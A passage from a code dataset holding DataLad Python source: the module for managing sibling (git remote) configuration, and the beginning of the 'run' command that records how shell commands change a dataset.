datalad.support.annexrepo import AnnexRepo\nfrom datalad.support.constraints import (\n EnsureBool,\n EnsureChoice,\n EnsureNone,\n EnsureStr,\n)\nfrom datalad.support.exceptions import (\n AccessDeniedError,\n AccessFailedError,\n CapturedException,\n CommandError,\n DownloadError,\n InsufficientArgumentsError,\n RemoteNotAvailableError,\n)\nfrom datalad.support.gitrepo import GitRepo\nfrom datalad.support.network import (\n RI,\n URL,\n PathRI,\n)\nfrom datalad.support.param import Parameter\nfrom datalad.utils import (\n Path,\n ensure_list,\n slash_join,\n)\n\nfrom .dataset import (\n EnsureDataset,\n datasetmethod,\n)\n\nlgr = logging.getLogger('datalad.distribution.siblings')\n\n\ndef _mangle_urls(url, ds_name):\n if not url:\n return url\n return url.replace(\"%NAME\", ds_name.replace(\"/\", \"-\"))\n\n\n@build_doc\nclass Siblings(Interface):\n \"\"\"Manage sibling configuration\n\n This command offers four different actions: 'query', 'add', 'remove',\n 'configure', 'enable'. 'query' is the default action and can be used to obtain\n information about (all) known siblings. 'add' and 'configure' are highly\n similar actions, the only difference being that adding a sibling\n with a name that is already registered will fail, whereas\n re-configuring a (different) sibling under a known name will not\n be considered an error. 'enable' can be used to complete access\n configuration for non-Git sibling (aka git-annex special remotes).\n Lastly, the 'remove' action allows for the\n removal (or de-configuration) of a registered sibling.\n\n For each sibling (added, configured, or queried) all known sibling\n properties are reported. This includes:\n\n \"name\"\n Name of the sibling\n\n \"path\"\n Absolute path of the dataset\n\n \"url\"\n For regular siblings at minimum a \"fetch\" URL, possibly also a\n \"pushurl\"\n\n Additionally, any further configuration will also be reported using\n a key that matches that in the Git configuration.\n\n By default, sibling information is rendered as one line per sibling\n following this scheme::\n\n <dataset_path>: <sibling_name>(<+|->) [<access_specification]\n\n where the `+` and `-` labels indicate the presence or absence of a\n remote data annex at a particular remote, and `access_specification`\n contains either a URL and/or a type label for the sibling.\n \"\"\"\n # make the custom renderer the default, path reporting isn't the top\n # priority here\n result_renderer = 'tailored'\n\n _params_ = dict(\n dataset=Parameter(\n args=(\"-d\", \"--dataset\"),\n doc=\"\"\"specify the dataset to configure. If\n no dataset is given, an attempt is made to identify the dataset\n based on the input and/or the current working directory\"\"\",\n constraints=EnsureDataset() | EnsureNone()),\n name=Parameter(\n args=('-s', '--name',),\n metavar='NAME',\n doc=\"\"\"name of the sibling. For addition with path \"URLs\" and\n sibling removal this option is mandatory, otherwise the hostname\n part of a given URL is used as a default. This option can be used\n to limit 'query' to a specific sibling.\"\"\",\n constraints=EnsureStr() | EnsureNone()),\n action=Parameter(\n args=('action',),\n nargs='?',\n doc=\"\"\"command action selection (see general documentation)\"\"\",\n constraints=EnsureChoice('query', 'add', 'remove', 'configure', 'enable')),\n url=Parameter(\n args=('--url',),\n doc=\"\"\"the URL of or path to the dataset sibling named by\n `name`. For recursive operation it is required that\n a template string for building subdataset sibling URLs\n is given.\\n List of currently available placeholders:\\n\n %%NAME\\tthe name of the dataset, where slashes are replaced by\n dashes.\"\"\",\n constraints=EnsureStr() | EnsureNone(),\n nargs=\"?\"),\n pushurl=Parameter(\n args=('--pushurl',),\n doc=\"\"\"in case the `url` cannot be used to publish to the dataset\n sibling, this option specifies a URL to be used instead.\\nIf no\n `url` is given, `pushurl` serves as `url` as well.\"\"\",\n constraints=EnsureStr() | EnsureNone()),\n description=location_description,\n\n ## info options\n # --template/cfgfrom gh-1462 (maybe also for a one-time inherit)\n # --wanted gh-925 (also see below for add_sibling approach)\n\n fetch=Parameter(\n args=(\"--fetch\",),\n action=\"store_true\",\n doc=\"\"\"fetch the sibling after configuration\"\"\"),\n as_common_datasrc=Parameter(\n args=(\"--as-common-datasrc\",),\n metavar='NAME',\n doc=\"\"\"configure a sibling as a common data source of the\n dataset that can be automatically used by all consumers of the\n dataset. The sibling must be a regular Git remote with a\n configured HTTP(S) URL.\"\"\"),\n publish_depends=publish_depends,\n publish_by_default=publish_by_default,\n annex_wanted=annex_wanted_opt,\n annex_required=annex_required_opt,\n annex_group=annex_group_opt,\n annex_groupwanted=annex_groupwanted_opt,\n inherit=inherit_opt,\n get_annex_info=Parameter(\n args=(\"--no-annex-info\",),\n dest='get_annex_info',\n action=\"store_false\",\n doc=\"\"\"Whether to query all information about the annex configurations\n of siblings. Can be disabled if speed is a concern\"\"\"),\n recursive=recursion_flag,\n recursion_limit=recursion_limit)\n\n @staticmethod\n @datasetmethod(name='siblings')\n @eval_results\n def __call__(\n action='query',\n *,\n dataset=None,\n name=None,\n url=None,\n pushurl=None,\n description=None,\n # TODO consider true, for now like add_sibling\n fetch=False,\n as_common_datasrc=None,\n publish_depends=None,\n publish_by_default=None,\n annex_wanted=None,\n annex_required=None,\n annex_group=None,\n annex_groupwanted=None,\n inherit=False,\n get_annex_info=True,\n recursive=False,\n recursion_limit=None):\n\n # TODO: Detect malformed URL and fail?\n # XXX possibly fail if fetch is False and as_common_datasrc\n\n if annex_groupwanted and not annex_group:\n raise InsufficientArgumentsError(\n \"To set groupwanted, you need to provide annex_group option\")\n\n # TODO catch invalid action specified\n action_worker_map = {\n 'query': _query_remotes,\n 'add': _add_remote,\n 'configure': _configure_remote,\n 'remove': _remove_remote,\n 'enable': _enable_remote,\n }\n # all worker strictly operate on a single dataset\n # anything that deals with hierarchies and/or dataset\n # relationships in general should be dealt with in here\n # at the top-level and vice versa\n worker = action_worker_map[action]\n\n ds = require_dataset(\n dataset,\n # it makes no sense to use this command without a dataset\n check_installed=True,\n purpose='configure sibling')\n refds_path = ds.path\n\n res_kwargs = dict(refds=refds_path, logger=lgr)\n\n ds_name = op.basename(ds.path)\n\n # do not form single list of datasets (with recursion results) to\n # give fastest possible response, for the precise of a long-all\n # function call\n\n # minimize expensive calls to .repo\n ds_repo = ds.repo\n\n # prepare common parameterization package for all worker calls\n worker_kwargs = dict(\n name=name,\n fetch=fetch,\n description=description,\n as_common_datasrc=as_common_datasrc,\n publish_depends=publish_depends,\n publish_by_default=publish_by_default,\n annex_wanted=annex_wanted,\n annex_required=annex_required,\n annex_group=annex_group,\n annex_groupwanted=annex_groupwanted,\n inherit=inherit,\n get_annex_info=get_annex_info,\n res_kwargs=res_kwargs,\n )\n yield from worker(\n ds=ds,\n repo=ds_repo,\n known_remotes=ds_repo.get_remotes(),\n # for top-level dataset there is no layout questions\n url=_mangle_urls(url, ds_name),\n pushurl=_mangle_urls(pushurl, ds_name),\n **worker_kwargs)\n if not recursive:\n return\n\n # do we have instructions to register siblings with some alternative\n # layout?\n replicate_local_structure = url and \"%NAME\" not in url\n\n subds_pushurl = None\n for subds in ds.subdatasets(\n state='present',\n recursive=recursive, recursion_limit=recursion_limit,\n result_xfm='datasets'):\n subds_repo = subds.repo\n subds_name = op.relpath(subds.path, start=ds.path)\n if replicate_local_structure:\n subds_url = slash_join(url, subds_name)\n if pushurl:\n subds_pushurl = slash_join(pushurl, subds_name)\n else:\n subds_url = \\\n _mangle_urls(url, '/'.join([ds_name, subds_name]))\n subds_pushurl = \\\n _mangle_urls(pushurl, '/'.join([ds_name, subds_name]))\n yield from worker(\n ds=subds,\n repo=subds_repo,\n known_remotes=subds_repo.get_remotes(),\n url=subds_url,\n pushurl=subds_pushurl,\n **worker_kwargs)\n\n @staticmethod\n def custom_result_renderer(res, **kwargs):\n from datalad.ui import ui\n\n # should we attempt to remove an unknown sibling, complain like Git does\n if res['status'] == 'notneeded' and res['action'] == 'remove-sibling':\n ui.message(\n '{warn}: No sibling \"{name}\" in dataset {path}'.format(\n warn=ac.color_word('Warning', ac.LOG_LEVEL_COLORS['WARNING']),\n **res)\n )\n return\n if res['status'] != 'ok' or not res.get('action', '').endswith('-sibling') :\n generic_result_renderer(res)\n return\n path = op.relpath(res['path'],\n res['refds']) if res.get('refds', None) else res['path']\n got_url = 'url' in res\n spec = '{}{}{}{}'.format(\n res.get('url', ''),\n ' (' if got_url else '',\n res.get('annex-externaltype', 'git'),\n ')' if got_url else '')\n ui.message('{path}: {name}({with_annex}) [{spec}]'.format(\n **dict(\n res,\n path=path,\n # TODO report '+' for special remotes\n with_annex='+' if 'annex-uuid' in res \\\n else ('-' if res.get('annex-ignore', None) else '?'),\n spec=spec)))\n\n\n# always copy signature from above to avoid bugs\ndef _add_remote(ds, repo, name, known_remotes, url, pushurl, as_common_datasrc,\n res_kwargs, **unused_kwargs):\n # TODO: allow for no url if 'inherit' and deduce from the super ds\n # create-sibling already does it -- generalize/use\n # Actually we could even inherit/deduce name from the super by checking\n # which remote it is actively tracking in current branch... but may be\n # would be too much magic\n\n # it seems that the only difference is that `add` should fail if a remote\n # already exists\n if (url is None and pushurl is None):\n raise InsufficientArgumentsError(\n \"\"\"insufficient information to add a sibling\n (needs at least a dataset, and any URL).\"\"\")\n\n # a pushurl should always be able to fill in for a not\n # specified url, however, only when adding new remotes,\n # not when configuring existing remotes (to avoid undesired\n # overwriting of configurations), hence done here only\n if url is None:\n url = pushurl\n\n if not name:\n urlri = RI(url)\n # use the hostname as default remote name\n try:\n name = urlri.hostname\n except AttributeError:\n raise InsufficientArgumentsError(\n \"cannot derive a default remote name from '{}', \"\n \"please specify a name.\".format(url))\n lgr.debug(\n \"No sibling name given, use URL hostname '%s' as sibling name\",\n name)\n\n if not name:\n raise InsufficientArgumentsError(\"no sibling name given\")\n if name in known_remotes:\n yield get_status_dict(\n action='add-sibling',\n status='error',\n path=ds.path,\n type='sibling',\n name=name,\n message=(\"sibling is already known: %s, use `configure` instead?\", name),\n **res_kwargs)\n return\n # XXX this check better be done in configure too\n # see https://github.com/datalad/datalad/issues/5914\n if as_common_datasrc == name:\n raise ValueError('Sibling name ({}) and common data source name ({}) '\n 'can not be identical.'.format(name, as_common_datasrc))\n if isinstance(RI(url), PathRI):\n # make sure any path URL is stored in POSIX conventions for consistency\n # with git's behavior (e.g. origin configured by clone)\n url = Path(url).as_posix()\n # this remote is fresh: make it known\n # just minimalistic name and URL, the rest is coming from `configure`\n repo.add_remote(name, url)\n known_remotes.append(name)\n # always copy signature from above to avoid bugs\n for r in _configure_remote(\n ds=ds, repo=repo, name=name, known_remotes=known_remotes, url=url,\n pushurl=pushurl, as_common_datasrc=as_common_datasrc,\n res_kwargs=res_kwargs, **unused_kwargs):\n if r['action'] == 'configure-sibling':\n r['action'] = 'add-sibling'\n yield r\n\n\ndef _configure_remote(\n ds, repo, name, known_remotes, url, pushurl, fetch, description,\n as_common_datasrc, publish_depends, publish_by_default,\n annex_wanted, annex_required, annex_group, annex_groupwanted,\n inherit, res_kwargs, **unused_kwargs):\n result_props = dict(\n action='configure-sibling',\n path=ds.path,\n type='sibling',\n name=name,\n **res_kwargs)\n if name is None:\n result_props['status'] = 'error'\n result_props['message'] = 'need sibling `name` for configuration'\n yield result_props\n return\n\n if name != 'here':\n # do all configure steps that are not meaningful for the 'here' sibling\n # AKA the local repo\n if name not in known_remotes and url:\n # this remote is fresh: make it known\n # just minimalistic name and URL, the rest is coming from `configure`\n repo.add_remote(name, url)\n known_remotes.append(name)\n elif url:\n # not new, override URl if given\n repo.set_remote_url(name, url)\n\n # make sure we have a configured fetch expression at this point\n fetchvar = 'remote.{}.fetch'.format(name)\n if fetchvar not in repo.config:\n # place default fetch refspec in config\n # same as `git remote add` would have added\n repo.config.add(\n fetchvar,\n '+refs/heads/*:refs/remotes/{}/*'.format(name),\n scope='local')\n\n if pushurl:\n repo.set_remote_url(name, pushurl, push=True)\n\n if publish_depends:\n # Check if all `deps` remotes are known to the `repo`\n unknown_deps = set(ensure_list(publish_depends)).difference(\n known_remotes)\n if unknown_deps:\n result_props['status'] = 'error'\n result_props['message'] = (\n 'unknown sibling(s) specified as publication dependency: %s',\n unknown_deps)\n yield result_props\n return\n\n # define config var name for potential publication dependencies\n depvar = 'remote.{}.datalad-publish-depends'.format(name)\n # and default pushes\n dfltvar = \"remote.{}.push\".format(name)\n\n if fetch:\n # fetch the remote so we are up to date\n for r in Update.__call__(\n dataset=ds.path,\n sibling=name,\n merge=False,\n recursive=False,\n on_failure='ignore',\n return_type='generator',\n result_xfm=None):\n # fixup refds\n r.update(res_kwargs)\n yield r\n\n delayed_super = _DelayedSuper(repo)\n if inherit and delayed_super.super is not None:\n # Adjust variables which we should inherit\n publish_depends = _inherit_config_var(\n delayed_super, depvar, publish_depends)\n publish_by_default = _inherit_config_var(\n delayed_super, dfltvar, publish_by_default)\n # Copy relevant annex settings for the sibling\n # makes sense only if current AND super are annexes, so it is\n # kinda a boomer, since then forbids having a super a pure git\n if isinstance(repo, AnnexRepo) and \\\n isinstance(delayed_super.repo, AnnexRepo) and \\\n name in delayed_super.repo.get_remotes():\n if annex_wanted is None:\n annex_wanted = _inherit_annex_var(\n delayed_super, name, 'wanted')\n if annex_required is None:\n annex_required = _inherit_annex_var(\n delayed_super, name, 'required')\n if annex_group is None:\n # I think it might be worth inheritting group regardless what\n # value is\n #if annex_wanted in {'groupwanted', 'standard'}:\n annex_group = _inherit_annex_var(\n delayed_super, name, 'group'\n )\n if annex_wanted == 'groupwanted' and annex_groupwanted is None:\n # we better have a value for the expression for that group\n annex_groupwanted = _inherit_annex_var(\n delayed_super, name, 'groupwanted'\n )\n\n if publish_depends:\n if depvar in ds.config:\n # config vars are incremental, so make sure we start from\n # scratch\n ds.config.unset(depvar, scope='local', reload=False)\n for d in ensure_list(publish_depends):\n lgr.info(\n 'Configure additional publication dependency on \"%s\"',\n d)\n ds.config.add(depvar, d, scope='local', reload=False)\n ds.config.reload()\n\n if publish_by_default:\n if dfltvar in ds.config:\n ds.config.unset(dfltvar, scope='local', reload=False)\n for refspec in ensure_list(publish_by_default):\n lgr.info(\n 'Configure additional default publication refspec \"%s\"',\n refspec)\n ds.config.add(dfltvar, refspec, 'local')\n ds.config.reload()\n\n assert isinstance(repo, GitRepo) # just against silly code\n if isinstance(repo, AnnexRepo):\n # we need to check if added sibling an annex, and try to enable it\n # another part of the fix for #463 and #432\n try:\n exc = None\n if not ds.config.obtain(\n 'remote.{}.annex-ignore'.format(name),\n default=False,\n valtype=EnsureBool(),\n store=False):\n repo.enable_remote(name)\n except (CommandError, DownloadError) as exc:\n # Note: CommandError happens with git-annex\n # 6.20180416+gitg86b18966f-1~ndall+1 (prior 6.20180510, from\n # which starts to fail with AccessFailedError) if URL is bogus,\n # so enableremote fails. E.g. as \"tested\" in test_siblings\n # TODO yield\n ce = CapturedException(exc)\n repo.config.reload()\n if repo.is_remote_annex_ignored(name):\n # Only inform user about the failure, if it's actually\n # consequential, because annex decided to set\n # annex-ignore=true.\n lgr.info(\"Could not annex-enable %s: %s\", name, exc.stderr)\n\n if as_common_datasrc:\n # we need a fully configured remote here\n # do not re-use `url`, but ask for the remote config\n # that git-annex will use too\n remote_url = repo.config.get(f'remote.{name}.url')\n ri = RI(remote_url)\n if isinstance(ri, URL) and ri.scheme in ('http', 'https'):\n # XXX what if there is already a special remote\n # of this name? Above check for remotes ignores special\n # remotes. we need to `git annex dead REMOTE` on reconfigure\n # before we can init a new one\n # XXX except it is not enough\n\n # make special remote of type=git (see #335)\n repo.call_annex([\n 'initremote',\n as_common_datasrc,\n 'type=git',\n 'location={}'.format(remote_url),\n 'autoenable=true'])\n else:\n yield dict(\n status='impossible',\n message='cannot configure as a common data source, '\n 'URL protocol is not http or https',\n **result_props)\n #\n # place configure steps that also work for 'here' below\n #\n if isinstance(repo, AnnexRepo):\n for prop, var in (('wanted', annex_wanted),\n ('required', annex_required),\n ('group', annex_group)):\n if var is not None:\n repo.set_preferred_content(prop, var, '.' if name =='here' else name)\n if annex_groupwanted:\n repo.set_groupwanted(annex_group, annex_groupwanted)\n\n if description:\n if not isinstance(repo, AnnexRepo):\n result_props['status'] = 'impossible'\n result_props['message'] = 'cannot set description of a plain Git repository'\n yield result_props\n return\n repo.call_annex(['describe', name, description])\n\n # report all we know at once\n info = list(_query_remotes(ds, repo, name, known_remotes, **unused_kwargs))[0]\n info.update(dict(status='ok', **result_props))\n yield info\n\n\ndef _query_remotes(ds, repo, name, known_remotes, get_annex_info=True,\n res_kwargs=None, **unused_kwargs):\n res_kwargs = res_kwargs or {}\n annex_info = {}\n available_space = None\n want_annex_info = get_annex_info and isinstance(repo, AnnexRepo)\n if want_annex_info:\n # pull repo info from annex\n try:\n # need to do in safety net because of gh-1560\n raw_info = repo.repo_info(fast=True)\n except CommandError:\n raw_info = {}\n available_space = raw_info.get('available local disk space', None)\n for trust in ('trusted', 'semitrusted', 'untrusted'):\n ri = raw_info.get('{} repositories'.format(trust), [])\n for r in ri:\n uuid = r.get('uuid', '00000000-0000-0000-0000-00000000000')\n if uuid.startswith('00000000-0000-0000-0000-00000000000'):\n continue\n ainfo = annex_info.get(uuid, {})\n ainfo['description'] = r.get('description', None)\n annex_info[uuid] = ainfo\n # treat the local repo as any other remote using 'here' as a label\n remotes = [name] if name else ['here'] + known_remotes\n special_remote_info = None\n if want_annex_info:\n # query it once here, and inspect per-remote further down\n special_remote_info = repo.get_special_remotes()\n\n for remote in remotes:\n info = get_status_dict(\n action='query-sibling',\n path=ds.path,\n type='sibling',\n name=remote,\n **res_kwargs)\n if remote != 'here' and remote not in known_remotes:\n info['status'] = 'error'\n info['message'] = 'unknown sibling name'\n yield info\n continue\n # now pull everything we know out of the config\n # simply because it is cheap and we don't have to go through\n # tons of API layers to be able to work with it\n if remote == 'here':\n # special case: this repo\n # aim to provide info using the same keys as for remotes\n # (see below)\n for src, dst in (('annex.uuid', 'annex-uuid'),\n ('core.bare', 'annex-bare'),\n ('annex.version', 'annex-version')):\n val = ds.config.get(src, None)\n if val is None:\n continue\n info[dst] = val\n if available_space is not None:\n info['available_local_disk_space'] = available_space\n else:\n # common case: actual remotes\n for remotecfg in [k for k in ds.config.keys()\n if k.startswith('remote.{}.'.format(remote))]:\n info[remotecfg[8 + len(remote):]] = ds.config[remotecfg]\n if get_annex_info and info.get('annex-uuid', None):\n ainfo = annex_info.get(info['annex-uuid'], {})\n annex_description = ainfo.get('description', None)\n if annex_description is not None:\n info['annex-description'] = annex_description\n if want_annex_info:\n if not repo.is_remote_annex_ignored(remote):\n try:\n for prop in ('wanted', 'required', 'group'):\n var = repo.get_preferred_content(\n prop, '.' if remote == 'here' else remote)\n if var:\n info['annex-{}'.format(prop)] = var\n groupwanted = repo.get_groupwanted(remote)\n if groupwanted:\n info['annex-groupwanted'] = groupwanted\n except CommandError as exc:\n if 'cannot determine uuid' in exc.stderr:\n ce = CapturedException(exc)\n repo.config.reload()\n if repo.is_remote_annex_ignored(remote):\n lgr.warning(\n \"%s was marked by git-annex as annex-ignore.\"\n \"Edit .git/config to reset if you think that \"\n \"was done by mistake due to absent \"\n \"connection etc.\",\n remote)\n info['annex-ignore'] = True\n else:\n raise\n else:\n info['annex-ignore'] = True\n\n if special_remote_info:\n # pull out special remote info for this remote, if there is any\n for k, v in special_remote_info.get(\n info.get('annex-uuid'), {}).items():\n info[f'annex-{k}'] = v\n\n info['status'] = 'ok'\n yield info\n\n\ndef _remove_remote(ds, repo, name, res_kwargs, **unused_kwargs):\n if not name:\n # TODO we could do ALL instead, but that sounds dangerous\n raise InsufficientArgumentsError(\"no sibling name given\")\n result_props = dict(\n action='remove-sibling',\n path=ds.path,\n type='sibling',\n name=name,\n **res_kwargs)\n try:\n # failure can happen and is OK\n repo.remove_remote(name)\n except RemoteNotAvailableError as e:\n yield get_status_dict(\n # result-oriented! given remote is absent already\n status='notneeded',\n **result_props)\n return\n\n yield get_status_dict(\n status='ok',\n **result_props)\n\n\ndef _enable_remote(ds, repo, name, res_kwargs, **unused_kwargs):\n result_props = dict(\n action='enable-sibling',\n path=ds.path,\n type='sibling',\n name=name,\n **res_kwargs)\n\n if not isinstance(repo, AnnexRepo):\n yield dict(\n result_props,\n status='impossible',\n message='cannot enable sibling of non-annex dataset')\n return\n\n if name is None:\n yield dict(\n result_props,\n status='error',\n message='require `name` of sibling to enable')\n return\n\n # get info on special remote\n sp_remotes = {v['name']: dict(v, uuid=k) for k, v in repo.get_special_remotes().items()}\n remote_info = sp_remotes.get(name, None)\n\n if remote_info is None:\n yield dict(\n result_props,\n status='impossible',\n message=(\"cannot enable sibling '%s', not known\", name))\n return\n\n env = None\n cred = None\n if remote_info.get('type', None) == 'webdav':\n # a webdav special remote -> we need to supply a username and password\n if not ('WEBDAV_USERNAME' in os.environ and 'WEBDAV_PASSWORD' in os.environ):\n # nothing user-supplied\n # let's consult the credential store\n hostname = urlparse(remote_info.get('url', '')).netloc\n if not hostname:\n yield dict(\n result_props,\n status='impossible',\n message=\"cannot determine remote host, credential lookup for webdav access is not possible, and not credentials were supplied\")\n cred = UserPassword('webdav:{}'.format(hostname))\n if not cred.is_known:\n try:\n cred.enter_new(\n instructions=\"Enter credentials for authentication with WEBDAV server at {}\".format(hostname),\n user=os.environ.get('WEBDAV_USERNAME', None),\n password=os.environ.get('WEBDAV_PASSWORD', None))\n except KeyboardInterrupt:\n # user hit Ctrl-C\n yield dict(\n result_props,\n status='impossible',\n message=\"credentials are required for sibling access, abort\")\n return\n creds = cred()\n # update the env with the two necessary variable\n # we need to pass a complete env because of #1776\n env = dict(\n os.environ,\n WEBDAV_USERNAME=creds['user'],\n WEBDAV_PASSWORD=creds['password'])\n\n try:\n repo.enable_remote(name, env=env)\n result_props['status'] = 'ok'\n except AccessDeniedError as e:\n # credentials are wrong, wipe them out\n if cred and cred.is_known:\n cred.delete()\n result_props['status'] = 'error'\n result_props['message'] = str(e)\n except AccessFailedError as e:\n # some kind of connection issue\n result_props['status'] = 'error'\n result_props['message'] = str(e)\n except Exception as e:\n # something unexpected\n raise e\n\n yield result_props\n\n\ndef _inherit_annex_var(ds, remote, cfgvar):\n if cfgvar == 'groupwanted':\n var = getattr(ds.repo, 'get_%s' % cfgvar)(remote)\n else:\n var = ds.repo.get_preferred_content(cfgvar, remote)\n if var:\n lgr.info(\"Inherited annex config from %s %s = %s\",\n ds, cfgvar, var)\n return var\n\n\ndef _inherit_config_var(ds, cfgvar, var):\n if var is None:\n var = ds.config.get(cfgvar)\n if var:\n lgr.info(\n 'Inherited publish_depends from %s: %s',\n ds, var)\n return var\n\n\nclass _DelayedSuper(object):\n \"\"\"A helper to delay deduction on super dataset until needed\n\n But if asked and not found -- would return None for everything\n \"\"\"\n\n def __init__(self, repo):\n self._child_dataset = Dataset(repo.path)\n self._super = None\n self._super_tried = False\n\n def __str__(self):\n return str(self.super)\n\n @property\n def super(self):\n if not self._super_tried:\n self._super_tried = True\n # here we must analyze current_ds's super, not the super_ds\n self._super = self._child_dataset.get_superdataset()\n if not self._super:\n lgr.warning(\n \"Cannot determine super dataset for %s, thus \"\n \"probably nothing would be inherited where desired\"\n % self._child_dataset\n )\n return self._super\n\n # Lean proxies going through .super\n @property\n def config(self):\n return self.super.config if self.super else None\n\n @property\n def repo(self):\n return self.super.repo if self.super else None\n" }, { "alpha_fraction": 0.585058867931366, "alphanum_fraction": 0.5862988829612732, "avg_line_length": 37.40161895751953, "blob_id": "8cff958dcb0be578d9cb8b1dd919cf0419681bd0", "content_id": "a2ca86772a5143d094c350d21b28754982b73129", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 42741, "license_type": "permissive", "max_line_length": 87, "num_lines": 1113, "path": "/datalad/core/local/run.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"Run arbitrary commands and track how they modify a dataset\"\"\"\n\n__docformat__ = 'restructuredtext'\n\n\nimport json\nimport logging\nimport os\nimport os.path as op\nimport warnings\nfrom argparse import REMAINDER\nfrom pathlib import Path\nfrom tempfile import mkdtemp\n\nimport datalad\nimport datalad.support.ansi_colors as ac\nfrom datalad.config import anything2bool\nfrom datalad.core.local.save import Save\nfrom datalad.core.local.status import Status\nfrom datalad.distribution.dataset import (\n Dataset,\n EnsureDataset,\n datasetmethod,\n require_dataset,\n)\nfrom datalad.distribution.get import Get\nfrom datalad.distribution.install import Install\nfrom datalad.interface.base import (\n Interface,\n build_doc,\n eval_results,\n)\nfrom datalad.interface.common_opts import (\n jobs_opt,\n save_message_opt,\n)\nfrom datalad.interface.results import get_status_dict\nfrom datalad.interface.utils import generic_result_renderer\nfrom datalad.local.unlock import Unlock\nfrom datalad.support.constraints import (\n EnsureBool,\n EnsureChoice,\n EnsureNone,\n)\nfrom datalad.support.exceptions import (\n CapturedException,\n CommandError,\n)\nfrom datalad.support.globbedpaths import GlobbedPaths\nfrom datalad.support.json_py import dump2stream\nfrom datalad.support.param import Parameter\nfrom datalad.ui import ui\nfrom datalad.utils import (\n SequenceFormatter,\n chpwd,\n ensure_list,\n ensure_unicode,\n get_dataset_root,\n getpwd,\n join_cmdline,\n quote_cmdlinearg,\n)\n\nlgr = logging.getLogger('datalad.core.local.run')\n\n\ndef _format_cmd_shorty(cmd):\n \"\"\"Get short string representation from a cmd argument list\"\"\"\n cmd_shorty = (join_cmdline(cmd) if isinstance(cmd, list) else cmd)\n cmd_shorty = u'{}{}'.format(\n cmd_shorty[:40],\n '...' if len(cmd_shorty) > 40 else '')\n return cmd_shorty\n\n\nassume_ready_opt = Parameter(\n args=(\"--assume-ready\",),\n constraints=EnsureChoice(None, \"inputs\", \"outputs\", \"both\"),\n doc=\"\"\"Assume that inputs do not need to be retrieved and/or outputs do not\n need to unlocked or removed before running the command. This option allows\n you to avoid the expense of these preparation steps if you know that they\n are unnecessary.\"\"\")\n\n\n@build_doc\nclass Run(Interface):\n \"\"\"Run an arbitrary shell command and record its impact on a dataset.\n\n It is recommended to craft the command such that it can run in the root\n directory of the dataset that the command will be recorded in. However,\n as long as the command is executed somewhere underneath the dataset root,\n the exact location will be recorded relative to the dataset root.\n\n If the executed command did not alter the dataset in any way, no record of\n the command execution is made.\n\n If the given command errors, a `CommandError` exception with the same exit\n code will be raised, and no modifications will be saved. A command\n execution will not be attempted, by default, when an error occurred during\n input or output preparation. This default ``stop`` behavior can be\n overridden via [CMD: --on-failure ... CMD][PY: `on_failure=...` PY].\n\n In the presence of subdatasets, the full dataset hierarchy will be checked\n for unsaved changes prior command execution, and changes in any dataset\n will be saved after execution. Any modification of subdatasets is also\n saved in their respective superdatasets to capture a comprehensive record\n of the entire dataset hierarchy state. The associated provenance record is\n duplicated in each modified (sub)dataset, although only being fully\n interpretable and re-executable in the actual top-level superdataset. For\n this reason the provenance record contains the dataset ID of that\n superdataset.\n\n *Command format*\n\n || REFLOW >>\n A few placeholders are supported in the command via Python format\n specification. \"{pwd}\" will be replaced with the full path of the current\n working directory. \"{dspath}\" will be replaced with the full path of the\n dataset that run is invoked on. \"{tmpdir}\" will be replaced with the full\n path of a temporary directory. \"{inputs}\" and \"{outputs}\" represent the\n values specified by [CMD: --input and --output CMD][PY: `inputs` and\n `outputs` PY]. If multiple values are specified, the values will be joined\n by a space. The order of the values will match that order from the command\n line, with any globs expanded in alphabetical order (like bash). Individual\n values can be accessed with an integer index (e.g., \"{inputs[0]}\").\n << REFLOW ||\n\n || REFLOW >>\n Note that the representation of the inputs or outputs in the formatted\n command string depends on whether the command is given as a list of\n arguments or as a string[CMD: (quotes surrounding the command) CMD]. The\n concatenated list of inputs or outputs will be surrounded by quotes when\n the command is given as a list but not when it is given as a string. This\n means that the string form is required if you need to pass each input as a\n separate argument to a preceding script (i.e., write the command as\n \"./script {inputs}\", quotes included). The string form should also be used\n if the input or output paths contain spaces or other characters that need\n to be escaped.\n << REFLOW ||\n\n To escape a brace character, double it (i.e., \"{{\" or \"}}\").\n\n Custom placeholders can be added as configuration variables under\n \"datalad.run.substitutions\". As an example:\n\n Add a placeholder \"name\" with the value \"joe\"::\n\n % datalad configuration --scope branch set datalad.run.substitutions.name=joe\n % datalad save -m \"Configure name placeholder\" .datalad/config\n\n Access the new placeholder in a command::\n\n % datalad run \"echo my name is {name} >me\"\n \"\"\"\n _examples_ = [\n dict(text=\"Run an executable script and record the impact on a dataset\",\n code_py=\"run(message='run my script', cmd='code/script.sh')\",\n code_cmd=\"datalad run -m 'run my script' 'code/script.sh'\"),\n dict(text=\"Run a command and specify a directory as a dependency \"\n \"for the run. The contents of the dependency will be retrieved \"\n \"prior to running the script\",\n code_cmd=\"datalad run -m 'run my script' -i 'data/*' \"\n \"'code/script.sh'\",\n code_py=\"\"\"\\\n run(cmd='code/script.sh', message='run my script',\n inputs=['data/*'])\"\"\"),\n dict(text=\"Run an executable script and specify output files of the \"\n \"script to be unlocked prior to running the script\",\n code_py=\"\"\"\\\n run(cmd='code/script.sh', message='run my script',\n inputs=['data/*'], outputs=['output_dir'])\"\"\",\n code_cmd=\"\"\"\\\n datalad run -m 'run my script' -i 'data/*' \\\\\n -o 'output_dir/*' 'code/script.sh'\"\"\"),\n dict(text=\"Specify multiple inputs and outputs\",\n code_py=\"\"\"\\\n run(cmd='code/script.sh',\n message='run my script',\n inputs=['data/*', 'datafile.txt'],\n outputs=['output_dir', 'outfile.txt'])\"\"\",\n code_cmd=\"\"\"\\\n datalad run -m 'run my script' -i 'data/*' \\\\\n -i 'datafile.txt' -o 'output_dir/*' -o \\\\\n 'outfile.txt' 'code/script.sh'\"\"\"),\n dict(text=\"Use ** to match any file at any directory depth recursively. \"\n \"Single * does not check files within matched directories.\",\n code_py=\"\"\"\\\n run(cmd='code/script.sh',\n message='run my script',\n inputs=['data/**/*.dat'],\n outputs=['output_dir/**'])\"\"\",\n 